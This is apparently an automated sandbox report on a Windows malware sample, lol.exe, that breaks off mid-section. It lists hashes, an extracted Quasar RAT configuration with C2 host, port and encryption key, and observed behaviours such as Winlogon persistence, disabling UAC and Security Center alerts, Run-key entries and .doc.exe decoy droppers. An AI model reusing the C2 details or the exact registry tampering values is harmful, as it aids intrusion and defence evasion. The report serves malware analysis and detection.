Analysis
-
max time kernel
52s -
max time network
70s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 22:28
General
-
Target
lol.exe
-
Size
20.3MB
-
MD5
1da87056da8166d6ed5e04d81aa5522c
-
SHA1
f3f81e8e0b116627682ae03ed6f004b2ac46f464
-
SHA256
7bfea7f092cf7638322f351474791f12b66ec22c66f0872f3488256839bc4c45
-
SHA512
cd9e5b62cc6918cc496dec0ab610a2d00c88d7e8285521730faecf881892070886c91ef9e0930f579e26d1cae20d09e0b233b365cdeabab4c29957c28e0e1b0f
-
SSDEEP
393216:PzuEpuRT4xFrlZfl23p33X55EWheYkv8LlCTe2x:v4RerlLa3nTEwrkACTec
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\SolaraBootstraper.exe family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Rover.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Program Files (x86)\\rover\\rover.exe" Rover.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
Processes:
yvhwidyjet.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" yvhwidyjet.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
yvhwidyjet.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" yvhwidyjet.exe -
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\scary.exe family_quasar behavioral1/memory/6088-2235-0x00000000009B0000-0x0000000000CD4000-memory.dmp family_quasar -
Processes:
Rover.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe -
Processes:
yvhwidyjet.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" yvhwidyjet.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
yvhwidyjet.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" yvhwidyjet.exe -
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/memory/1784-42-0x0000000005DE0000-0x0000000006330000-memory.dmp net_reactor behavioral1/memory/1784-44-0x0000000006920000-0x0000000006E6E000-memory.dmp net_reactor behavioral1/memory/1784-49-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-47-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-51-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-55-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-53-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-60-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-67-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-65-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-74-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-78-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-88-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-100-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-98-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-113-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-111-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-117-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-115-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-109-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-107-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-105-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-102-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-96-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-94-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-93-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-90-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-86-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-84-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-80-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-82-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-76-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-63-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-58-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor behavioral1/memory/1784-46-0x0000000006920000-0x0000000006E69000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exejaffa.exeloader.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation jaffa.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation loader.exe -
Executes dropped EXE 12 IoCs
Processes:
loader.exeRover.exepsiphon3.exescary.exethe.exeac3.exejaffa.exeyvhwidyjet.exevhivgvifgkpczqi.exeyypfyixy.exedxiawlncxveuy.exeyypfyixy.exepid process 3756 loader.exe 1784 Rover.exe 4516 psiphon3.exe 6088 scary.exe 6036 the.exe 5716 ac3.exe 5252 jaffa.exe 5440 yvhwidyjet.exe 4436 vhivgvifgkpczqi.exe 4244 yypfyixy.exe 5632 dxiawlncxveuy.exe 4360 yypfyixy.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\psiphon3.exe upx behavioral1/memory/4516-241-0x00000000008D0000-0x0000000001EF7000-memory.dmp upx behavioral1/memory/4516-2643-0x00000000008D0000-0x0000000001EF7000-memory.dmp upx -
Processes:
yvhwidyjet.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirstRunDisabled = "1" yvhwidyjet.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
vhivgvifgkpczqi.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\raozvodn = "yvhwidyjet.exe" vhivgvifgkpczqi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fbmkcojh = "vhivgvifgkpczqi.exe" vhivgvifgkpczqi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "dxiawlncxveuy.exe" vhivgvifgkpczqi.exe -
Processes:
Rover.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Rover.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Rover.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
yypfyixy.exeyvhwidyjet.exedescription ioc process File opened (read-only) \??\w: yypfyixy.exe File opened (read-only) \??\y: yypfyixy.exe File opened (read-only) \??\l: yypfyixy.exe File opened (read-only) \??\z: yypfyixy.exe File opened (read-only) \??\b: yvhwidyjet.exe File opened (read-only) \??\e: yvhwidyjet.exe File opened (read-only) \??\s: yvhwidyjet.exe File opened (read-only) \??\x: yvhwidyjet.exe File opened (read-only) \??\e: yypfyixy.exe File opened (read-only) \??\i: yypfyixy.exe File opened (read-only) \??\p: yypfyixy.exe File opened (read-only) \??\q: yypfyixy.exe File opened (read-only) \??\t: yypfyixy.exe File opened (read-only) \??\j: yvhwidyjet.exe File opened (read-only) \??\q: yvhwidyjet.exe File opened (read-only) \??\v: yvhwidyjet.exe File opened (read-only) \??\h: yypfyixy.exe File opened (read-only) \??\o: yypfyixy.exe File opened (read-only) \??\r: yvhwidyjet.exe File opened (read-only) \??\g: yypfyixy.exe File opened (read-only) \??\j: yypfyixy.exe File opened (read-only) \??\m: yypfyixy.exe File opened (read-only) \??\v: yypfyixy.exe File opened (read-only) \??\n: yvhwidyjet.exe File opened (read-only) \??\u: yvhwidyjet.exe File opened (read-only) \??\a: yypfyixy.exe File opened (read-only) \??\n: yypfyixy.exe File opened (read-only) \??\s: yypfyixy.exe File opened (read-only) \??\u: yypfyixy.exe File opened (read-only) \??\g: yvhwidyjet.exe File opened (read-only) \??\h: yvhwidyjet.exe File opened (read-only) \??\l: yvhwidyjet.exe File opened (read-only) \??\m: yvhwidyjet.exe File opened (read-only) \??\t: yvhwidyjet.exe File opened (read-only) \??\z: yvhwidyjet.exe File opened (read-only) \??\r: yypfyixy.exe File opened (read-only) \??\i: yvhwidyjet.exe File opened (read-only) \??\b: yypfyixy.exe File opened (read-only) \??\k: yypfyixy.exe File opened (read-only) \??\x: yypfyixy.exe File opened (read-only) \??\a: yvhwidyjet.exe File opened (read-only) \??\k: yvhwidyjet.exe File opened (read-only) \??\o: yvhwidyjet.exe File opened (read-only) \??\p: yvhwidyjet.exe File opened (read-only) \??\w: yvhwidyjet.exe File opened (read-only) \??\y: yvhwidyjet.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
yvhwidyjet.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0" yvhwidyjet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197" yvhwidyjet.exe -
AutoIT Executable 12 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\ac3.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\lol_9f9faff9-eb6b-4041-a302-1f7f101dee9c\jaffa.exe autoit_exe C:\Windows\SysWOW64\yvhwidyjet.exe autoit_exe C:\Windows\SysWOW64\vhivgvifgkpczqi.exe autoit_exe C:\Windows\SysWOW64\yypfyixy.exe autoit_exe C:\Windows\SysWOW64\dxiawlncxveuy.exe autoit_exe C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe autoit_exe C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe autoit_exe \??\c:\Users\Admin\Documents\PushSend.doc.exe autoit_exe C:\Users\Admin\Downloads\ExitUnblock.doc.exe autoit_exe \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe autoit_exe \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe autoit_exe -
Drops file in System32 directory 9 IoCs
Processes:
jaffa.exeyvhwidyjet.exedescription ioc process File opened for modification C:\Windows\SysWOW64\yypfyixy.exe jaffa.exe File created C:\Windows\SysWOW64\dxiawlncxveuy.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\dxiawlncxveuy.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll yvhwidyjet.exe File created C:\Windows\SysWOW64\yvhwidyjet.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\yvhwidyjet.exe jaffa.exe File created C:\Windows\SysWOW64\vhivgvifgkpczqi.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\vhivgvifgkpczqi.exe jaffa.exe File created C:\Windows\SysWOW64\yypfyixy.exe jaffa.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Rover.exedescription ioc process File opened for modification C:\Program Files (x86)\rover\Ashamed\Ashamed.007.png Rover.exe File created C:\Program Files (x86)\rover\_9Idle\_9Idle.020.png Rover.exe File created C:\Program Files (x86)\rover\_10Idle\_10Idle.034.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Exit\Exit.023.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_2Idle\_2Idle.009.png Rover.exe File created C:\Program Files (x86)\rover\Lick\Lick.012.png Rover.exe File created C:\Program Files (x86)\rover\Tired\Tired.007.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Tired\Tired.009.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.077.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_2Idle\_2Idle.011.png Rover.exe File created C:\Program Files (x86)\rover\_7Idle\_7Idle.010.png Rover.exe File created C:\Program Files (x86)\rover\_8Idle\_8Idle.002.png Rover.exe File created C:\Program Files (x86)\rover\Exit\Exit.029.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_9Idle\_9Idle.035.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Tired\Tired.008.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Come\Come.013.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Exit\Exit.013.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_3Idle\_3Idle.016.png Rover.exe File created C:\Program Files (x86)\rover\Slap\Slap.006.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Come\Come.002.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.043.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_6Idle\_6Idle.005.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_10Idle\_10Idle.023.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Tired\Tired.002.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Speak\Speak.002.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Come\Come.012.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.043.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.054.png Rover.exe File created C:\Program Files (x86)\rover\Ashamed\Ashamed.014.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.076.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.037.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.065.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_5Idle\_5Idle.001.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_9Idle\_9Idle.003.png Rover.exe File created C:\Program Files (x86)\rover\Speak\Speak.008.png Rover.exe File created C:\Program Files (x86)\rover\Come\Come.013.png Rover.exe File created C:\Program Files (x86)\rover\Exit\Exit.013.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Haf\Haf.003.png Rover.exe File created C:\Program Files (x86)\rover\_3Idle\_3Idle.003.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_3Idle\_3Idle.025.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_7Idle\_7Idle.015.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.036.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Lick\Lick.014.png Rover.exe File created C:\Program Files (x86)\rover\_3Idle\_3Idle.030.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_9Idle\_9Idle.027.png Rover.exe File created C:\Program Files (x86)\rover\_10Idle\_10Idle.010.png Rover.exe File created C:\Program Files (x86)\rover\RU_jokes.txt Rover.exe File opened for modification C:\Program Files (x86)\rover\GetAttention\GetAttention.004.png Rover.exe File opened for modification C:\Program Files (x86)\rover\GetAttention\GetAttention.008.png Rover.exe File created C:\Program Files (x86)\rover\_10Idle\_10Idle.018.png Rover.exe File created C:\Program Files (x86)\rover\Jump.wav Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.026.png Rover.exe File created C:\Program Files (x86)\rover\GetAttention\GetAttention.004.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_5Idle\_5Idle.017.png Rover.exe File created C:\Program Files (x86)\rover\Lick\Lick.010.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_3Idle\_3Idle.024.png Rover.exe File created C:\Program Files (x86)\rover\_10Idle\_10Idle.021.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_10Idle\_10Idle.028.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Start_Speak\Start_Speak.003.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Eat\Eat.010.png Rover.exe File created C:\Program Files (x86)\rover\Eat\Eat.027.png Rover.exe File opened for modification C:\Program Files (x86)\rover\_8Idle\_8Idle.011.png Rover.exe File created C:\Program Files (x86)\rover\Tired\Tired.003.png Rover.exe File opened for modification C:\Program Files (x86)\rover\Ashamed\Ashamed.013.png Rover.exe -
Drops file in Windows directory 3 IoCs
Processes:
WINWORD.EXEjaffa.exedescription ioc process File opened for modification C:\Windows\mydoc.rtf WINWORD.EXE File created C:\Windows\~$mydoc.rtf WINWORD.EXE File opened for modification C:\Windows\mydoc.rtf jaffa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 5488 4516 WerFault.exe psiphon3.exe 384 5904 WerFault.exe packer.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 3532 timeout.exe 1228 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
msedge.exeWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5520 taskkill.exe 776 taskkill.exe 5340 taskkill.exe 5456 taskkill.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048d568d859e9b2458dc6f77f6333805c00000000020000000000106600000001000020000000fde3f4ef9f9da3816622b58cb522473c78267d560ba0bfb871f7261fd3a17b72000000000e80000000020000200000009bf74fa63bdb0bee4d775613efbc5906649b308b4b9b1b7cf4f04fd5bb13fc3c200000007d3d0be5e511e0f86dfefc46380fe73027b25cd033185182e2e6f7f0bbcd95b6400000006758215b376cbed8b597fba11882791659556f0ce33342540db9fd8577d3cd6594e7b0971f563b5f9a44e9a8e677364d6a1455a1475a2e66faba77c501cf59b3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31108453" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0772cb2ac54bf01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b05931b2ac54bf01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2926116807" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31108453" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2926116807" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{D812F89E-1958-11EF-9519-F6C903454AA3} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048d568d859e9b2458dc6f77f6333805c000000000200000000001066000000010000200000005da9d8cad5eeccf8fee141fad4519adf8fba1ce53677dda7546971f695f3f62a000000000e8000000002000020000000315b4c0a23719c84d4c6fd4fa591f3764b5dd6032ca30467688e4d4310746b0520000000124026eeebced3de01a7db5e31416ffd961d0ca3c3ad3aa02fecc4569aae30f740000000c9473535be0ae2c51dea510ec67429769ae579d18d9a3ae96aa41c829f0f2013159273d8820b6d79aa27028ec21ca5c726cb204d7b28561738229c5e7e9c1a3a iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe -
Modifies registry class 28 IoCs
Processes:
